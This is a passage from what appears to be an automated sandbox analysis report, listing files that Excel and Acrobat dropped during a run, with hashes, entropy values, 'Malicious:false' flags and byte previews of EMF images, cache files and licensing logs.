                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                            C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt (copy)

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):794
                            Entropy (8bit):2.7142819241824805
                            Encrypted:false
                            SSDEEP:24:YIrNvpKAzLtwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLSc88AJtfJ52IHV
                            MD5:BD9E767E74B38030B097E6FED6464EB5
                            SHA1:03D9E758B4DB2B6E922BBBDE189C210AF676C648
                            SHA-256:4FCDC40B7579E1C625A21D9BD14B898D8854FE812BF76BB31D077E39E2FAF6B2
                            SHA-512:61FE087E54A696C70F69827B2136E8E34380F99FE5EFFB38392CF33C26D421B5ECF2A19EE041BD0BEC944412CCC6E8912DEFFBE15A0B77A20184F31BB6C794A5
                            Malicious:false
                            Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\20AD3E62.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Preview:....l...........b...............5?...Q.. EMF....(*..............................S....................*..U"......................................5?...Q..........c.......Q...l)..........b.......................c.......P...(...x....(...... ...5?...Q..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\38CB5668.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):98872
                            Entropy (8bit):2.668539610083046
                            Encrypted:false
                            SSDEEP:768:XO5J7vE1DE7ohzp66m6KOBToBqQbApQKyE:+OWE
                            MD5:93B3B49BD9024A98C8F941436CD53778
                            SHA1:05A4A8C5EEDA8C61B07FD886DA8B5ECEE7720EC4
                            SHA-256:4C00713FEDDF4D1AF8D0A8F9FB98F290975834F5DBAC2C9E98519ADC6D1BEAA4
                            SHA-512:325874EF76CB84DC303B37547CFD5B6BD134379A46AB55F76F790BF58C1F297ABEA179AE40EB4FF891462B813335B8A74FA517FDCBE85C39FC9E813D8A7DACC4
                            Malicious:false
                            Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3DBB1BCA.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):44256
                            Entropy (8bit):3.15066292565687
                            Encrypted:false
                            SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                            MD5:F1EC2E98B0F577B675156B13DCF94105
                            SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                            SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                            SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                            Malicious:false
                            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4852CCC0.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):98872
                            Entropy (8bit):2.631925202654186
                            Encrypted:false
                            SSDEEP:768:XOD+vv1DW7ohBb66mQK4BTonrxQbApQKYE:+cjE
                            MD5:8D8E0F9D697D37EF3F1D4DD5418DB971
                            SHA1:E30A55D2E4131E15CF14E1A6B3B77AD4D682DBF8
                            SHA-256:E279B0BBE538F2E18DEEC9B764AF9CAE38522E9351D904E32B6EFE188B5298CF
                            SHA-512:B0F28B80296F03146093A7F319682B21846DA792EAA0C84C4B49AE2C2B8C383F2FF09C56B61A24831B24EC74E1B4C4E44E2D483892F98DC6798DB88D3CD3C2E9
                            Malicious:false
                            Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\56E8D349.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Preview:....l...........b...............5?...Q.. EMF....(*..............................S....................*..U"......................................5?...Q..........c.......Q...l)..........b.......................c.......P...(...x....(...... ...5?...Q..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\59DD1307.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2563079623293435
                            Encrypted:false
                            SSDEEP:12:Yal/m/4sHoKnL8n/Ml/+B0n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXl:Yemb2sZb
                            MD5:F4B0E1C03C7BB160B48CFFA6160E2CBA
                            SHA1:3B95941606219C0EAF5FDB78E67C7F10BF21390B
                            SHA-256:06FD47AFCD865FAAEEF47C91837DFE45A7F0EC9F67E233767F9A7386B00326F0
                            SHA-512:F44D02569287398C2F97F3FD0F302E58DAA66C646EAC3E05DE5CD6965A3F0E2C9A5446A89B237CE622FD5583937BE137E0FBD09E3ABF5FC7ADBE834CCF52A65F
                            Malicious:false
                            Preview:....l...........b................*...7.. EMF....(*..........................8...X....................?...........................................*...7..........c.......Q...l)..........b.......................c.......P...(...x....(...... ....*...7..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\664CE543.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):99352
                            Entropy (8bit):2.668869758190582
                            Encrypted:false
                            SSDEEP:768:hOpAgv81D97ohP46ScVK4BTonhrQbApQKdE:UTeE
                            MD5:33F9E1A965F0A0D7C74DDD10AD599E6D
                            SHA1:A899900BF288BF09E9D8DF868E127529077A60C2
                            SHA-256:8A89E51B9DD7845727812445E4AB210883BDF82350D5B65445A8C7354E87CB0B
                            SHA-512:58F4EE56A13A7457F577D09F082B8EE52FAE4CABC9D59A134CF60C7C519A39BB6C0FA7F604FED42988597B8E02CE5C66F141C1CA99C01639FA0A7E2D1962E64E
                            Malicious:false
                            Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\817DC15C.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):44256
                            Entropy (8bit):3.147465798679962
                            Encrypted:false
                            SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                            MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                            SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                            SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                            SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                            Malicious:false
                            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\906979AD.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):109544
                            Entropy (8bit):4.282675970330063
                            Encrypted:false
                            SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                            MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                            SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                            SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                            SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                            Malicious:false
                            Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BEE9B39E.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1293620
                            Entropy (8bit):4.563127917199792
                            Encrypted:false
                            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                            MD5:F71C973B5E362DFD6408D6C009E5643E
                            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                            Malicious:false
                            Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C73936FB.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Preview:....l...........b...............5?...Q.. EMF....(*..............................S....................*..U"......................................5?...Q..........c.......Q...l)..........b.......................c.......P...(...x....(...... ...5?...Q..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D022D0B6.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Preview:....l...........b...............5?...Q.. EMF....(*..............................S....................*..U"......................................5?...Q..........c.......Q...l)..........b.......................c.......P...(...x....(...... ...5?...Q..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D2B31D3F.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Preview:....l...........b...............5?...Q.. EMF....(*..............................S....................*..U"......................................5?...Q..........c.......Q...l)..........b.......................c.......P...(...x....(...... ...5?...Q..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EBE69634.emf

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):98872
                            Entropy (8bit):2.631925202654186
                            Encrypted:false
                            SSDEEP:768:XOD+vv1DW7ohBb66mQK4BTonrxQbApQKYE:+cjE
                            MD5:8D8E0F9D697D37EF3F1D4DD5418DB971
                            SHA1:E30A55D2E4131E15CF14E1A6B3B77AD4D682DBF8
                            SHA-256:E279B0BBE538F2E18DEEC9B764AF9CAE38522E9351D904E32B6EFE188B5298CF
                            SHA-512:B0F28B80296F03146093A7F319682B21846DA792EAA0C84C4B49AE2C2B8C383F2FF09C56B61A24831B24EC74E1B4C4E44E2D483892F98DC6798DB88D3CD3C2E9
                            Malicious:false
                            Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

                            C:\Users\user\AppData\Local\Temp\8815474D.tmp

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):794
                            Entropy (8bit):2.7142819241824805
                            Encrypted:false
                            SSDEEP:24:YIrNvpKAzLtwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLSc88AJtfJ52IHV
                            MD5:BD9E767E74B38030B097E6FED6464EB5
                            SHA1:03D9E758B4DB2B6E922BBBDE189C210AF676C648
                            SHA-256:4FCDC40B7579E1C625A21D9BD14B898D8854FE812BF76BB31D077E39E2FAF6B2
                            SHA-512:61FE087E54A696C70F69827B2136E8E34380F99FE5EFFB38392CF33C26D421B5ECF2A19EE041BD0BEC944412CCC6E8912DEFFBE15A0B77A20184F31BB6C794A5
                            Malicious:false
                            Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                            C:\Users\user\AppData\Local\Temp\MSIc5341.LOG

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):246
                            Entropy (8bit):3.5065515051498046
                            Encrypted:false
                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Er6Ow:Qw946cPbiOxDlbYnuRK4
                            MD5:873AE62E36BD7FB614F23695CDBFCE3F
                            SHA1:F8FAA139AF8AA625F42EFE45D05C516388BC661C
                            SHA-256:AF7E24EE8349095B8DBA7BD38D083AE346E43F7D0073A7345D49F0B3047A8034
                            SHA-512:E96D019906BEF53BCA31606AB2053A47196717065DB0C383FE6D61B9511C52DB4337E8F3B7A56EE8116C18A81415EFE47505D39FB9243CF02F3242039BF14F46
                            Malicious:false
                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.0./.1.2./.2.0.2.4. . .0.0.:.4.8.:.4.8. .=.=.=.....

                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-10 00-48-39-773.log

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with very long lines (393)
                            Category:dropped
                            Size (bytes):16525
                            Entropy (8bit):5.376360055978702
                            Encrypted:false
                            SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                            MD5:1336667A75083BF81E2632FABAA88B67
                            SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                            SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                            SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                            Malicious:false
                            Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                            Category:dropped
                            Size (bytes):16605
                            Entropy (8bit):5.364697518770256
                            Encrypted:false
                            SSDEEP:384:oiWbWGewEiVtwdn5nT7S8biqJyIAh5Jz2hprl9Lqmf/bj9eUqmWHTyTybScWSZxE:qsJb
                            MD5:FD121802F7569BE5C6AA8A9B2F822DEE
                            SHA1:B8F9CA863BE2896ACB2BCAC953CB0C0C1E70F95E
                            SHA-256:97D91DD909532F063F94B5827ADF6ADA57048EC1E1F19D6C1A1347007C854BA8
                            SHA-512:5A4A3F5B2DD844868B56D2178C682BB4A473F38E2BE4E249898612A261243F69A4F36AEAE6D91981F0E4EB078177F9AAC542D81BF1752DCEB3C462B8DC4A1305
                            Malicious:false
                            Preview:SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:798-0500 ThreadID=7204 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_NglAppLib Description="SetConf

                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):29845
